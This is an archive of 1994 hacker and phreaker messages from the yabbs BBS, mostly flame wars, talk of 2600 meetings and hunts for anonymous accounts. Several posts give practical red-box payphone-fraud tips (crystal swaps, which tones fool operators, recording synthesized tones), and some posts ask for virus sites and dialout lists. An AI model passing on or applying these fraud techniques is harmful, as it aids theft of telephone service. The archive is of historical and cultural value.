because of AXE it seem to make life hard .... is there anyone that have some kind of in fo on AXE .. is it _possible_ by not to extreem means to fool with it ? From Morph@yabbs Sat Mar 5 09:54:08 1994 From: Morph@yabbs To: all@yabbs Subject: 2600 Date: Sat Mar 5 09:54:08 1994 Ahh...went to the 2600 meeting last night...god it was cool.. They all have *SO* much information...HaCkErs should rule the world.... btw, anyone have on OKI 900 for sale? programmed or umprogrammed.... From cosmos@yabbs Sun Mar 6 14:40:56 1994 From: cosmos@yabbs To: Morph@yabbs Subject: re: 2600 Date: Sun Mar 6 14:40:56 1994 This is what happens when one attensds 2600 This is your brain, this is your brain on 2600 highs. Friends dont let friends do 2600 meets... Cosmos From Morph@yabbs Sun Mar 6 17:32:14 1994 From: Morph@yabbs To: cosmos@yabbs Subject: re: 2600 Date: Sun Mar 6 17:32:14 1994 Ok Ok...2600 high... so shoot was cool though... From radiant@yabbs Sun Mar 6 17:45:52 1994 From: radiant@yabbs To: Morph@yabbs Subject: all Date: Sun Mar 6 17:45:52 1994 Hehehe I would love an OKI-900 especially after reading the December Nuts and Volts!!!! :) From cosmos@yabbs Sun Mar 6 18:54:50 1994 From: cosmos@yabbs To: Morph@yabbs Subject: re: 2600 Date: Sun Mar 6 18:54:50 1994 heheh I was at one okay 2600 meet once. But then the BBS junkies showed up and it turned into the usual make me a redbox show me the cellular shit and whos got da k0d3Z lamefest it usually is Cosmos From Morph@yabbs Sun Mar 6 20:09:19 1994 From: Morph@yabbs To: radiant@yabbs Subject: re: all Date: Sun Mar 6 20:09:19 1994 Yeah...someone at the 2600, 2 ppl as a matter of fact, had them.... They werent programmed, but they can still be used as cellular's not worth $300 for a scanner though... one guy had a cool redbox, bernie...instead of the usual spdt, it had a mercury switch, when thee box was rightside up, it was a dialer when it was upside down, it was a redbox,... From JasonLee@yabbs Sun Mar 6 23:06:42 1994 From: JasonLee@yabbs To: cosmos@yabbs Subject: re: 2600 Date: Sun Mar 6 23:06:42 1994 Oh come on! What's so terrible about the 2600 meetings? From what I've seen, not much real hacking or plotting or anything goes on, it's just friends just hanging around. JasonLee From MetalGod@yabbs Mon Mar 7 01:26:50 1994 From: MetalGod@yabbs To: JasonLee@yabbs Subject: re: 2600 Date: Mon Mar 7 01:26:50 1994 Most of the people here (LA) who go to 2600 meetings are BBS junkies, and if you know what the state of BBSing is like around here, you'd avoid 2600 meetings like the plague.. I know I do. MetalGod (formerly BassGod) From cosmos@yabbs Mon Mar 7 09:52:23 1994 From: cosmos@yabbs To: Morph@yabbs Subject: re: all Date: Mon Mar 7 09:52:23 1994 Wow!!!!! A dialer and a redbox!! |<-RaD 3l33t! It's called a combo box and is made just as easy as the idiot red box with out the dialer still in place. Yep, sounds like the same old 2600 to me. Cosmos From cosmos@yabbs Mon Mar 7 09:55:36 1994 From: cosmos@yabbs To: JasonLee@yabbs Subject: re: 2600 Date: Mon Mar 7 09:55:36 1994 Well, if hanging around high school BBS junkies and ignorant morons with a coupole of red boxes is cool then go for it. SOme of us actually have better things to do Cosmos /s From JasonLee@yabbs Mon Mar 7 15:24:17 1994 From: JasonLee@yabbs To: MetalGod@yabbs Subject: re: 2600 Date: Mon Mar 7 15:24:17 1994 Yes, I understand very well. There were a couple BBS guys at the last DC meeting I went to, and they just sat around, playing with some MFM HDs they brought for no apparent reason. Damn, BBSes are annoying. At least, hack ones are. There are some fun places where you can talk and stuff... JasonLee From JasonLee@yabbs Mon Mar 7 15:26:24 1994 From: JasonLee@yabbs To: cosmos@yabbs Subject: re: 2600 Date: Mon Mar 7 15:26:24 1994 No, what I'm saying is that if you have friends who will be there who you rarely see (except through computer connections), then the meetings are fun. Of course, none of us have friends who are BBS junkies or red box freaks. Nope, not us. ;) JasonLee From RAgent@yabbs Tue Mar 8 07:10:29 1994 From: RAgent@yabbs To: all@yabbs Subject: Hacking Date: Tue Mar 8 07:10:29 1994 Hey dudes, I am probably the best hacker on the modern scene. I can do it all and I aint got busted yet. YOu want RedBox?? I got it and I can make them for you guys too. I know about IRC and MUCK/MUDS and I have a UniX account that I hacked with a cool password hacker. 2600 is the coolest. COSMO go fudgepack a dog, I am too better than uyou and you know it...2600 is for cool people like me not people like you. Ive crashed systems everywhere and lot of BBS systems too. RAgent From Dauber@yabbs Tue Mar 8 09:13:37 1994 From: Dauber@yabbs To: RAgent@yabbs Subject: re: Hacking Date: Tue Mar 8 09:13:37 1994 It is a general rule that anyone who brags about his/her hacking experiene s should be classifeied a lamer... Can't wait till the sysop sees your message! If you're so good, why not try to crash this bbs? From cosmos@yabbs Tue Mar 8 10:37:05 1994 From: cosmos@yabbs To: RAgent@yabbs Subject: re: Hacking Date: Tue Mar 8 10:37:05 1994 This is a joke...right?? God I hope so... I know the real RAgent jerkoff...nice try. Cosmos From 000@yabbs Tue Mar 8 11:59:58 1994 From: 000@yabbs To: cosmos@yabbs Subject: re: Hacking Date: Tue Mar 8 11:59:58 1994 I'd tend to agree as anyone e who tends to brag about hacking, and hasn't gotten caught yet is bound to very shortly. 000 From Morph@yabbs Tue Mar 8 16:40:12 1994 From: Morph@yabbs To: cosmos@yabbs Subject: re: all Date: Tue Mar 8 16:40:12 1994 I know...i have a dialer and a red box, i just meant that the mercury switch was cool.... From JasonLee@yabbs Tue Mar 8 19:11:12 1994 From: JasonLee@yabbs To: RAgent@yabbs Subject: re: Hacking Date: Tue Mar 8 19:11:12 1994 That was cool! HAHAHAA!!! I love sarcasm! That was sarcastic, wasn't it? It wasn't? In that case: HAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHA!!!!!!!! Ah, hackers! Don't you love them? JasonLee From Kashmir@yabbs Thu Mar 10 00:24:40 1994 From: Kashmir@yabbs To: Dauber@yabbs Subject: re: Hacking Date: Thu Mar 10 00:24:40 1994 No kiddin.. most people who say they're hackers most of the time aren't. From Angstrom@yabbs Fri Mar 11 20:06:41 1994 From: Angstrom@yabbs To: all@yabbs Subject: bbs.. Date: Fri Mar 11 20:06:41 1994 Alright here's a board my friend just set up if anyone is interested 1-706-613-0750 this is a H/P only and the NUP is Willow...later From Phain@yabbs Tue Mar 15 11:53:39 1994 From: Phain@yabbs To: all@yabbs Subject: Loud Hackers Date: Tue Mar 15 11:53:39 1994 Funny thing, From what I've seen those who brag about their abilities the most have few true abilities to brag about. Hacking isn't about speaking loud words, it's about doing deeds. Anyone who thinks loudmouthing on BBS's is a really great idea needs to get a clue. Better yet, they need to read _The Hacker Crackdown_ by Bruce Sterling. Those who can, do. Those who can't value volume over action. RAgent, get a life man. none of us give a flying f**k how loud you can type. Say something useful or just keep your mouth shut. -Phain From uufnord@yabbs Tue Mar 15 14:36:07 1994 From: uufnord@yabbs To: all@yabbs Subject: my heroin addiction Date: Tue Mar 15 14:36:07 1994 i'd just like to say that my heroin addiction has caused me to stop using caps. From Jeremiah@yabbs Tue Mar 15 16:15:17 1994 From: Jeremiah@yabbs To: Phain@yabbs Subject: re: Loud Hackers Date: Tue Mar 15 16:15:17 1994 I agree, there have been some loadmouthed people here talking... Actions speed louder than words children... Anyway, The Hacker Crackdown was a great book... Do you know of any other good realing like that? From panzer@yabbs Tue Mar 15 20:19:21 1994 From: panzer@yabbs To: all@yabbs Subject: BBS Advert Date: Tue Mar 15 20:19:21 1994 As someone else has posted a BBS number, I thought I toss this out also. I help run this system, and we are specializing in privacy for the users. If you would like more information than either leave me mail here. Or the preferred way, ------------------------------------------------------------------------ - = * > D A T A H A V E N P R O J E C T < * = - ------------------------------------------------------------------------ Unrestricted Zone of Information +1 412 683 8582 ------------------------------------------------------------------------ FULL INTERNET access for all users. Shell accounts with access to ALL tools available on UNIX machines. All Accounts FULLY LEGAL We Specialize in Privacy of ALL Users Contact Us For More Information About Our "Group" Accounts Catering To All Kinds of Computer Hobbyists/Specialists $25 USD for First Month -- $10 USD Each Additional Month From Dprogram@yabbs Tue Mar 15 21:42:35 1994 From: Dprogram@yabbs To: Jeremiah@yabbs Subject: re: Loud Hackers Date: Tue Mar 15 21:42:35 1994 I think it's obious that RAgent is a joke on the level of BIFF. From JasonLee@yabbs Wed Mar 16 13:35:17 1994 From: JasonLee@yabbs To: panzer@yabbs Subject: re: BBS Advert Date: Wed Mar 16 13:35:17 1994 That sounds like a nice place. I might have to get an account there once I get out of school. What sort of modem access is there? Local lines everywhere, or would I have to dial long-distance (from Maryland) to connect? JasonLee From Destro@yabbs Wed Mar 16 23:44:11 1994 From: Destro@yabbs To: RAgent@yabbs Subject: re: Hacking Date: Wed Mar 16 23:44:11 1994 Heh! I've personaly noticed that the more a person has to defend or proclaim his/her abilities, in ANY field of endevour, he/she is blowing hot air ... Cosmos may not be the ultimate hacker, I doubt that he/she is, simply because of the stagering probabilities involved. But I know two things: YOU are not God's gift to hackers 2) Cosmos knows what he/she is talking about (notably, those who do, usually only talk when they do). Go back to kydie skuul, cuz u ain't red-e 4 the real wurld ... From Justin@yabbs Thu Mar 17 12:30:09 1994 From: Justin@yabbs To: Angstrom@yabbs Subject: re: bbs.. Date: Thu Mar 17 12:30:09 1994 Hmmm... That's North Georgia, I believe. My neck of the woods. Were is it based in? I cosysoped one of the first big bbs' in North Georgia, Cybernet. I was just curious, being that North Georgia's a pretty small place. Take it easy.... Justin, From Dprogram@yabbs Thu Mar 17 19:41:41 1994 From: Dprogram@yabbs To: all@yabbs Subject: red ... Date: Thu Mar 17 19:41:41 1994 People kept telling me that if you used the 6.49 Mhz crystal on the disgustingly infamous Rat Shack dialer, the frequencies "can't" be blocked, becasu they are the correct frequencies. Then I learned that the combo box doesn't produce a correct quarter anyway, but does five nickels! That thing still fools ACTS, but it would never work on an operator, and phreaks need to know this. I considered building a quarter-type red box, but I've reconsidered. The combo box conversionn was supposed to be a quick hack job to get you red boxing in a hurry, and it worked in this respect. But my energy would be better spent making a good quality recording from a real pay phone. Whoever got the non-memory dialer, using redial to send dimes seems like not such a bad idea after all to me. Also, you can open it up and access the extra DTMF tones (A-D). I tried using a tape recordeing without success, but something like DAT would do the job, I'll bet. From Morph@yabbs Thu Mar 17 21:45:42 1994 From: Morph@yabbs To: Dprogram@yabbs Subject: re: red ... Date: Thu Mar 17 21:45:42 1994 if you encounter an operator, then just put in a real coin, i nickel or dime or something, then go from there... They started making the boxes again, they're the same inside, but they look totally different, all black with grey buttons...its cool.. From Xela@yabbs Fri Mar 18 13:47:49 1994 From: Xela@yabbs To: Dprogram@yabbs Subject: digital tones Date: Fri Mar 18 13:47:49 1994 My frined has a mac program which can generate digital tones using the mathematical formulas which determine the tones in the first place. I believe it uses a Fourier series to approximate the tones that crystal makes. Anyway, we fed the tones into my pearlcorder and off to the pay phone! DAT recording through an optical feed would be even better, but a DAT recorder costs 800 dollars and the optical line costs another 50, so it isn't cheap. And you would have to have an optical output from the mac, or pc (whatever you happen to use). L8rs, Alex From cosmos@yabbs Sun Mar 20 18:50:20 1994 From: cosmos@yabbs To: Destro@yabbs Subject: re: Hacking Date: Sun Mar 20 18:50:20 1994 heheh...Male buddy. ;) Me an ultimate hacker??? nahhhh Cosmos From Angstrom@yabbs Mon Mar 21 18:24:11 1994 From: Angstrom@yabbs To: Justin@yabbs Subject: re: bbs.. Date: Mon Mar 21 18:24:11 1994 Yep, the board is based in Ahtesn, GA. I have heard of the Cybernet BBS but it was a bit early for my time :)...there is now over 4000 virii on this board...later. From TheDev@yabbs Tue Mar 22 03:56:10 1994 From: TheDev@yabbs To: Dprogram@yabbs Subject: re: red ... Date: Tue Mar 22 03:56:10 1994 Although the RatShack conversion models produce horribly timed pseudo quarters, they DO fool the operators I have dealt with. I've seen international calls made with 'em (where you have to deal with an operator). The DEv From hawkwind@yabbs Tue Mar 22 20:09:37 1994 From: hawkwind@yabbs To: all@yabbs Subject: IIRG and TRSI Date: Tue Mar 22 20:09:37 1994 Greetz, OK, I was doing some H/P NU verification test on some board, and I think I got most of the questions but the following two puzzled me. --call me a newbie, or maybe I'm just missing the obvious? Anyway, can anyone shed the light on these: 1. IIRG 2. TRSI L8rs, Hawk. From cosmos@yabbs Tue Mar 22 21:03:03 1994 From: cosmos@yabbs To: hawkwind@yabbs Subject: re: IIRG and TRSI Date: Tue Mar 22 21:03:03 1994 In message IIRG and TRSI, hawkwind said: > Greetz, > OK, I was doing some H/P NU verification test on some board, and I think > I got most of the questions but the following two puzzled me. > --call me a newbie, or maybe I'm just missing the obvious? > Anyway, can anyone shed the light on these: > 1. IIRG > 2. TRSI > L8rs, > Hawk. > Pffft... First off these so called "H/P" BBS are a load of crap. And any crummy worthless high school kiddie BBS that makes me take tests to get on is not worth my time or effort. Have fun being 3l33t Cosmos From Bingley@yabbs Wed Mar 23 21:13:30 1994 From: Bingley@yabbs To: cosmos@yabbs Subject: re: IIRG and TRSI Date: Wed Mar 23 21:13:30 1994 >Pffft... > >First off these so called "H/P" BBS are a load of crap. And any crummy >worthless high school kiddie BBS that makes me take tests to get on is not >worth my time or effort. > >Have fun being 3l33t > >Cosmos Nice attitude. Why not be constructive instead of being such a lam3r? This guy asked for help, not for your obnoxious comments. GET OFF YOUR HIGH HORSE COSMOS. From SamIam@yabbs Thu Mar 24 01:02:02 1994 From: SamIam@yabbs To: hawkwind@yabbs Subject: re: IIRG and TRSI Date: Thu Mar 24 01:02:02 1994 IIRG sounds very familiar... TRSI is a pirate group (tristar redsector i think) I don't know why an h/p board would have THAT as a question oh well... good luck From cosmos@yabbs Thu Mar 24 09:46:19 1994 From: cosmos@yabbs To: Bingley@yabbs Subject: re: IIRG and TRSI Date: Thu Mar 24 09:46:19 1994 Nahh...Id rather stay on it Bingley. Are you justifying the 3l33t BBS scene?? Perhaps you should get your head examined. Cosmos (On the mighty horse as always) From cosmos@yabbs Thu Mar 24 09:46:52 1994 From: cosmos@yabbs To: SamIam@yabbs Subject: re: IIRG and TRSI Date: Thu Mar 24 09:46:52 1994 Because they are lame Sam. Cosmos From peg@yabbs Fri Mar 25 09:43:31 1994 From: peg@yabbs To: all@yabbs Subject: Something wierd with tasm f Date: Fri Mar 25 09:43:31 1994 Hm.. I see that the password file here has been reset, and somebodye else has taken my old username, oh well. Anywaay: Does anyone know if something wierd has happened with the tasm from bcc3.1? I nneded to write a program that put a wrapper on some other programs that I have (to prevent lamers from modifying text in the program), and I decided to use the example virii from 40hex vol 8. Only problem is that I can only get that program to run propperly if i singlestep through it, using td386. If I try to run it, it runs head-first into an halt instruction, whre the jump should have been. Seems like the dosint which was supposed to set the PSP fails. My system: dos 5.0 (I think, dont really remember, as I've replaced dos with linux most of the time). 486dx-33 20mb ram. btw: does anyone know any i-net sites that cary the 40hex vols after vol 10? I'm also looking for a site carrying viriis. I'll make my anon e-mail address, as well as my public-key (pgp) available as soon as I get to a terminal with cut&paste. Sorry for the typos, but this link is slllooowwwww. (norway->us) From SamIam@yabbs Sat Mar 26 12:09:59 1994 From: SamIam@yabbs To: arachnoi@yabbs Subject: re: IIRG and TRSI Date: Sat Mar 26 12:09:59 1994 I like it ;) From SamIam@yabbs Sat Mar 26 12:11:50 1994 From: SamIam@yabbs To: peg@yabbs Subject: re: Something wierd with tasm f Date: Sat Mar 26 12:11:50 1994 has 40hex *shhhhhh* ;) From SamIam@yabbs Sat Mar 26 12:14:08 1994 From: SamIam@yabbs To: SamIam@yabbs Subject: re: Something wierd with tasm f Date: Sat Mar 26 12:14:08 1994 Why don't you read the whole thread before replying, LAMER 'nuff sed From NStalker@yabbs Sun Mar 27 12:38:51 1994 From: NStalker@yabbs To: all@yabbs Subject: anon unix or at least mail Date: Sun Mar 27 12:38:51 1994 Gawd, do you know how long it takes to read all 898 messages in this message board? (hint: many hours) I am trying to find a freenet out there somewhere that is _totally_ anonymous, where I don't have to send anything in to them, or pay... NYX is cool, but I don't wanna send id, I tried others too. santafe wants me to sign something, and mindvox wants money (like most places) I need at least anon mail. I can get mail at as Night.Stalker, but I can't reply or send mail outside the system... Is there anywhere someone could point me to which allows me at least a mail account with a name I pick, and preferably a Unix account with telnet/ftp? It seems that there _used_ to be more anon places, but they all now require ID or something... DIALOUTS: This seemed to be a hot topic, oh, maybe 600 posts back or so. Anyone got sites/lists they wanna trade? Mail> me here (or actually, @ me here) I got various lists...Especially looking for 815/708/414/608 if there are such avail. I have no outside lines here, so the inet is my only link to the world :( I have thought of anon mail via, but that defeats the purpose, as sysadmins here at school can still read my mail if they wish since all that does is forwards it. __ ///|//<<'/< . ///|//<<'/< From feotus@yabbs Sun Mar 27 13:33:10 1994 From: feotus@yabbs To: NStalker@yabbs Subject: re: anon unix or at least mail Date: Sun Mar 27 13:33:10 1994 at I believe it is there is a BBS that will allow you to mail and recieve mail from outside completely anon. Take s alittle time to get validated and you dont get shell acces, but if all you wnt is an address than go there. As for, if your looking for someplace where the sysop wont read your mail, you'll be looking forever man. The best thing you can do is get yoursefl a copy of PGP publik key encrytpian scheme and use that for all of the questionable mail, and IMO use it as much as possible, since there most definetly are people out there reading mail. Sysops, sniffers etc.. From buzzbomb@yabbs Sun Mar 27 14:17:46 1994 From: buzzbomb@yabbs To: Bingley@yabbs Subject: re: IIRG and TRSI Date: Sun Mar 27 14:17:46 1994 all those bbs's usually are are people trading warez, codez, maybe a few passwords they pilfered, virii that they don't know how to use... i'm not all that knowledgeable about a lot of stuff, but i'll be the first to admit it. the guys that run 90% of those boards are a bunch of mooching posers. or at least that;s been my experience. not too mention they've got an attitude twice as bad as most of the people here seem to think cosmo has. From cosmos@yabbs Sun Mar 27 18:42:49 1994 From: cosmos@yabbs To: NStalker@yabbs Subject: re: anon unix or at least mail Date: Sun Mar 27 18:42:49 1994 708 eh??? A chicago burbs man?? 815 is downstate right?? As for the account, have fun finding a total anonymous account to read mail, news, and ftp/telnet to...find a sysadmin or system that will create one for you. Or just be 3l33t and hack one. Cosmos From cosmos@yabbs Sun Mar 27 18:44:48 1994 From: cosmos@yabbs To: buzzbomb@yabbs Subject: re: IIRG and TRSI Date: Sun Mar 27 18:44:48 1994 Spell my name right fuckface. You want an attitude, Ill give it to you. But I give you credit for the sysop poser part...100% true. GIve me c0d3z d00d Cosmos ---> 3l33t \/\/aR3Z d00d From uufnord@yabbs Mon Mar 28 00:24:06 1994 From: uufnord@yabbs To: all@yabbs Subject: newbie question Date: Mon Mar 28 00:24:06 1994 How do I post a message on yabbs? From robtelee@yabbs Mon Mar 28 00:50:23 1994 From: robtelee@yabbs To: uufnord@yabbs Subject: newbie question Date: Mon Mar 28 00:50:23 1994 You just did...all of us were newbies at one time... From Skywise@yabbs Mon Mar 28 02:01:17 1994 From: Skywise@yabbs To: robtelee@yabbs Subject: re: newbie question Date: Mon Mar 28 02:01:17 1994 NOT TRUE! I was NEVER a newbie! Right COSMO? hehehe From cosmos@yabbs Mon Mar 28 05:15:13 1994 From: cosmos@yabbs To: Skywise@yabbs Subject: re: newbie question Date: Mon Mar 28 05:15:13 1994 Right fucknut. Now spell my goddamn name right lamer. Cosmos From Bingley@yabbs Mon Mar 28 06:04:10 1994 From: Bingley@yabbs To: cosmos@yabbs Subject: Cosmas newbie? Date: Mon Mar 28 06:04:10 1994 I wonder if everyone was an ass towards you when you were a newbie Cosmo. Perhaps that is why you are so bitter today. Keep on being eleet, c0zm0z From NStalker@yabbs Mon Mar 28 06:05:53 1994 From: NStalker@yabbs To: cosmos@yabbs Subject: 815 Date: Mon Mar 28 06:05:53 1994 815 is Rockford, and Crystal Lake where I'm from...and 708 is 2 mins away... And yeah, I think I am going to go PGP soon. As soon as I get the Unix one (already have DOS) Ya think there'll be any problems using my same key in both OS's? Now that I thought about it, no...stupid. :) From cosmos@yabbs Mon Mar 28 06:50:32 1994 From: cosmos@yabbs To: Bingley@yabbs Subject: re: Cosmas newbie? Date: Mon Mar 28 06:50:32 1994 Nahhh...never...I was never new. Ever heard of sarcasm my little fork tounged friend?? Cosmos From cosmos@yabbs Mon Mar 28 06:51:43 1994 From: cosmos@yabbs To: NStalker@yabbs Subject: re: 815 Date: Mon Mar 28 06:51:43 1994 heheheh...Crystal Lake.... Ahh the burbs. Cosmos From cosmos@yabbs Mon Mar 28 11:56:48 1994 From: cosmos@yabbs To: all@yabbs Subject: Can it get any lamer than t Date: Mon Mar 28 11:56:48 1994 The lamest excuse for a newsgroup has got to be alt.2600... The shit posted there is at best mildly amusing. In fact, wading through the majority of AOL, DELPHI, and CompuServe morons that post there makes this place here qualify as an 3l33t board. ;) My favorite post today was "Hey dudes, has anyone ever tried the 8lgm stuff??" <--- proof that cro-magnon man still exists. Cosmos From dmonger@yabbs Mon Mar 28 13:36:14 1994 From: dmonger@yabbs To: cosmos@yabbs Subject: re: newbie question Date: Mon Mar 28 13:36:14 1994 osmos also works :) -peter From feotus@yabbs Mon Mar 28 14:08:12 1994 From: feotus@yabbs To: all@yabbs Subject: sum Date: Mon Mar 28 14:08:12 1994 hehe, the 8LeggedRooveMachine stuff is just so up to date and I am so surprised that they were nmot shot for putting it out man. Gee alt.2600 has all the greatest AOL hackers you'll ever find. I bet they could even get you Frogger pirated if you really wanted it. We all knoiw that all the really truly great hackers hang on AOL as an undercover account. Yeah that's the ticket. but not-so-seriously, how many lame posts have you seen in alt.cyberpunk alt.2600 (insert supposedly cool newsgroup here) from some AOL dick who just figured out their newsnet shit? I count at least a bazzilion in the last three minutes. on another note. Any substantiation to the rumor that is sniffed and decrypted? I dont hink they can break a 1024bit RSA key in less than a couple years right now, so i dont believe the decryptian part, unless the found a whole in IDEA, which I doubt. my question is how many people reading this newsgroup have actually done something original besides just eploit some overused and overdeveloped whole that someone told them about? Any original people here? And by original I mean doing something besides just running Crack? How about other projects? From Hellion@yabbs Mon Mar 28 15:14:27 1994 From: Hellion@yabbs To: arachnoi@yabbs Subject: re: IIRG and TRSI Date: Mon Mar 28 15:14:27 1994 Hey, could you E-mail me that? I have no idea how to get any of these messages off the bbs here *without a screen capture which I don't have on this machine that I am on. Ugggh.... Mail me at : thanx. If anyone knows how to save these let me know. -- Hellion From Hellion@yabbs Mon Mar 28 19:53:27 1994 From: Hellion@yabbs To: NStalker@yabbs Subject: re: anon unix or at least mail Date: Mon Mar 28 19:53:27 1994 Someone said that : > at I believe it is there is a BBS that will allow you I tried to telnet there, but I get an unknown host, any ideas on the ip number? -- Hellion From NStalker@yabbs Mon Mar 28 21:23:21 1994 From: NStalker@yabbs To: Hellion@yabbs Subject: re: anon unix or at least mail Date: Mon Mar 28 21:23:21 1994 Yeah, that address was a typo...I found it to really be, notice fau not fua. They want ya to send an id in before you can send mail out anyway. but I think you can read mail send TO you though. But launchpad does that anyway, and that's my newsreader. Feotus: I think I got a pirated copy of frogger in one of my disk boxes...want a copy? *grin* NightStalker From Hellion@yabbs Mon Mar 28 21:31:37 1994 From: Hellion@yabbs To: NStalker@yabbs Subject: launchpad Date: Mon Mar 28 21:31:37 1994 Okay, this may sound stupid, but I am just now getting the courage to use some of this stuff, so here goes... Just how do you get onto launchpad? I don't even know the telnet address. I must say to you all, though, that this has been the kindest enviroment for me to learn new stuff in. *wipes brown off nose* anyhow, just give me a break for being a newbie at this... -- Hellion From rieza@yabbs Tue Mar 29 02:10:32 1994 From: rieza@yabbs To: all@yabbs Subject: bow1.txt & bow2.txt Date: Tue Mar 29 02:10:32 1994 where can i get bow1.txt & bow2.txt ? From TheDev@yabbs Tue Mar 29 03:07:57 1994 From: TheDev@yabbs To: cosmos@yabbs Subject: re: newbie question Date: Tue Mar 29 03:07:57 1994 :Right fuknut. Now spell my goddamn name right lamer. : :Cosmos haha fuknut, that's a new one The Dev From Dauber@yabbs Tue Mar 29 15:43:20 1994 From: Dauber@yabbs To: uufnord@yabbs Subject: re: newbie question Date: Tue Mar 29 15:43:20 1994 > "How do I post a message on yabbs?" Uhh....pardon me for asking this, but.... How the hell did you post that one?? THAT's how you post a message on YABBS!! I didn't read the thread all the way thru--I was gonna scold you NO MATTER WHO AND HOW MANY DID!!!! From NStalker@yabbs Wed Mar 30 01:06:08 1994 From: NStalker@yabbs To: hellion@yabbs Subject: launchpad Date: Wed Mar 30 01:06:08 1994 Just telnet to, and enter launch as the login: then It'll ask you for your name, and you can give it anything you want, 'cause they don't check, and they don't ask anything else. er, there might be a place where you have to type new...but It'll tell you. From Lacey@yabbs Wed Mar 30 03:54:05 1994 From: Lacey@yabbs To: Dauber@yabbs Subject: re: newbie question Date: Wed Mar 30 03:54:05 1994 Let's try to be a little nicer. I'm sure that person didn't mean to ask a question that you have termed stupid. Give the kid a break. It takes a real ignorant asshole to say things like that even if you are just joking. Get a grip and cut the newbies some slack. From cosmos@yabbs Wed Mar 30 05:49:03 1994 From: cosmos@yabbs To: Dauber@yabbs Subject: re: newbie question Date: Wed Mar 30 05:49:03 1994 Hey, that's my job! ;) Cosmos From cosmos@yabbs Wed Mar 30 05:50:16 1994 From: cosmos@yabbs To: Lacey@yabbs Subject: re: newbie question Date: Wed Mar 30 05:50:16 1994 Oh come off it, the lame shit that posted it deserved a hell of alot more than that simple ribbing. If you cant take a flame, go to the poetry base. Cosmos From Lacey@yabbs Wed Mar 30 06:59:58 1994 From: Lacey@yabbs To: cosmos@yabbs Subject: re: newbie question Date: Wed Mar 30 06:59:58 1994 I'm glad to know what a closed mined person you are. Remember you were a newbie once too. Lacey From cosmos@yabbs Wed Mar 30 08:25:28 1994 From: cosmos@yabbs To: Lacey@yabbs Subject: re: newbie question Date: Wed Mar 30 08:25:28 1994 No I wasnt. Cosmos From dmonger@yabbs Wed Mar 30 12:13:33 1994 From: dmonger@yabbs To: cosmos@yabbs Subject: re: newbie question Date: Wed Mar 30 12:13:33 1994 your job ... okay ... sure i think you're idea that everyone deserves to be flamed is rather absurd. but then again that could be me -peter who forgot that oswald was born sitting in front of a computer From Skywise@yabbs Wed Mar 30 18:34:58 1994 From: Skywise@yabbs To: cosmos@yabbs Subject: re: newbie question Date: Wed Mar 30 18:34:58 1994 POETRY BASE! POETRY BASE! Don't use it as an insult _COSMO_ bwahahahaha (btw you should have flamed the hell out of that punk's lameness.) From cosmos@yabbs Wed Mar 30 19:26:32 1994 From: cosmos@yabbs To: Skywise@yabbs Subject: re: newbie question Date: Wed Mar 30 19:26:32 1994 IS it because of Sneakers that you guys insist on caling me COSMO??? No, no, no. It's COSMOS, it means something. At least it used to... As for flaming, I must have took my midol that morning... Cosmos From feotus@yabbs Wed Mar 30 20:48:26 1994 From: feotus@yabbs To: cosmos@yabbs Subject: you big dummy Date: Wed Mar 30 20:48:26 1994 gosh your so mean and bad i hate you im going to go tell my mom on you why dont you just, just, just go play asteroids im cool cause i play Shadowrun, that's where I learned how to hack im just the k-raddicaest hehehe, sarcasm man strikes again 8) wow, im pretty good at flame bait cosmo, hehe oops comsos dont you all just hate the formatting of this message it says I havea 99 line limit, and by god I'll use it, I SWEAR I WILL now now boys, don't hit n For those of you who have stayed tune this long congrats, your dum no but not so seriously, anyone know a good stream cypher? Me and some pals are gonna work on installing encryptian in a client server model ofr a little site we have so we are looking for a good stream cypher. DONT say RSA, sicne RSA is too slow and it's not a stream cyper anyways, it's block. And DONT sat DES, cause that's a block, actually PRODUCT, cypher, so haha again. We have a relatively secure one already, but all the other ones we found are either copyrighted or licensed so that it would be deleterious for us to use it, so we need our own. Also on another note, anyone know about what happened to penet? OOOPS, why the hell am I asking these questions on this lame echo, YUP, this has GOT to bea FIDO net echo cause those are the only ones capable of getting this primo LAME. Gosh, most of the times it's flame wars, and not even tasty ones at that. DOES ANYONE KNOW **ANYTHING** ABOUT HACKING/PHREAKING/CELLULAR FRAUD/VIRII/CRYPTOGRAPHY/CODING/CRACKING/PROGRAMMING From Kittycat@yabbs Thu Mar 31 01:19:15 1994 From: Kittycat@yabbs To: cosmos@yabbs Subject: fLAM3R Date: Thu Mar 31 01:19:15 1994 Cosmo you just don't know how to relate to poeple. Why can't you say something nice....ever? As for your perpetual flaming, use Preparation H coz. It releaves the itch and swelling that I'm sure you must have. Either that or there is a thistle rammed up your rear end. From lol@yabbs Thu Mar 31 01:56:14 1994 From: lol@yabbs To: all@yabbs Subject: hack/pirate ftp? Date: Thu Mar 31 01:56:14 1994 Salutations, Im pretty new to yabbs... but its pretty cool anyway. I wondered if any of ya know of a nice pirate/hack/anarchy ftp site?!?!? Living in a country where the word BBS is looked up in the dictionary is IMPOSSIBLE to find a pirate/hack/anarchy bbs... so the net is my ONLY way. Tnx in adv. Prometheus From lol@yabbs Thu Mar 31 02:07:00 1994 From: lol@yabbs To: all@yabbs Subject: ZMODEM!! Date: Thu Mar 31 02:07:00 1994 rz **B00000000000000 From Elaking@yabbs Thu Mar 31 04:30:56 1994 From: Elaking@yabbs To: all@yabbs Subject: a bit seriousness Date: Thu Mar 31 04:30:56 1994 [Things are like this... i'm writing this short essay on hacking and anarchism on the internet... I would very much appreciate if i could have an IRC interview or if any of U guys who know a shit (that is NO lamers) could post me something of interest, like cool e-zines (heavier than LOD, Phrack and those mother-in-law-formatted ones) and where to get a hold of them. I can be reached either here, or at: thnx alot \\\\Elaking From cosmos@yabbs Thu Mar 31 05:39:45 1994 From: cosmos@yabbs To: Kittycat@yabbs Subject: re: fLAM3R Date: Thu Mar 31 05:39:45 1994 Czesc kicia.... ;) Cosmos From Skywise@yabbs Thu Mar 31 08:47:33 1994 From: Skywise@yabbs To: cosmos@yabbs Subject: re: newbie question Date: Thu Mar 31 08:47:33 1994 Cosmo, did you get your name from the Jetsons? *grin* just kidding Cosmos, you telco database, you! ;) From htoaster@yabbs Thu Mar 31 10:04:44 1994 From: htoaster@yabbs To: lol@yabbs Subject: re: hack/pirate ftp? Date: Thu Mar 31 10:04:44 1994 In message hack/pirate ftp?, lol said: > Im pretty new to yabbs... but its pretty cool anyway. > I wondered if any of ya know of a nice pirate/hack/anarchy > ftp site?!?!? Living in a country where the word BBS > is looked up in the dictionary is IMPOSSIBLE to find > a pirate/hack/anarchy bbs... 